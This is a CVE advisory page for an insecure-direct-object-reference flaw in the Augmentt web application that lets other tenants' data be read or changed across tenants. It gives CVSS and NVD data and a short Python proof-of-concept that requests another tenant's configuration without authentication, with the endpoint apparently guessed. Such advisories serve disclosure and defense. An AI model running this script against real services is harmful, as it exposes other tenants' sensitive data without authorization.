CVE-2026-6355

Description

A vulnerability in the web application allows unauthorized users to access and manipulate sensitive data across different tenants by exploiting insecure direct object references. This could lead to unauthorized access to sensitive information and unauthorized changes to the tenant's configuration.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:augmentt:augmentt:*:*:*:*:*:*:*:* - VULNERABLE

Web Application (具体版本未在描述中指定)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_idor(target_url, victim_tenant_id):
    """
    PoC for IDOR Vulnerability (CVE-2026-6355)
    Attempts to access another tenant's configuration without authentication.
    """
    # The vulnerable endpoint might accept a tenant_id parameter
    params = {
        'tenant_id': victim_tenant_id,
        'action': 'get_config'
    }

    try:
        # Send request without authentication headers (PR:N)
        response = requests.get(target_url, params=params, timeout=10)

        if response.status_code == 200:
            print("[+] Exploit Successful! Leaked Data:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "https://example.com/api/v1/tenant/data"
    target_tenant = 9999  # ID of the target tenant
    exploit_idor(target, target_tenant)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6355
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6355
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6355/
[4] VulDB https://vuldb.com/cve/CVE-2026-6355
[5] https://github.com/Penguinsecq/CVE-2026-6355/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6355", "sourceIdentifier": "[email protected]", "published": "2026-04-22T14:17:06.627", "lastModified": "2026-05-12T20:17:24.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web application allows unauthorized users to access and manipulate sensitive data across different tenants by exploiting insecure direct object references. This could lead to unauthorized access to sensitive information and unauthorized changes to the tenant's configuration."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:augmentt:augmentt:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-10-02", "matchCriteriaId": "561E9514-79C5-446F-9247-84192E7DF352"}]}]}], "references": [{"url": "https://github.com/Penguinsecq/CVE-2026-6355/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}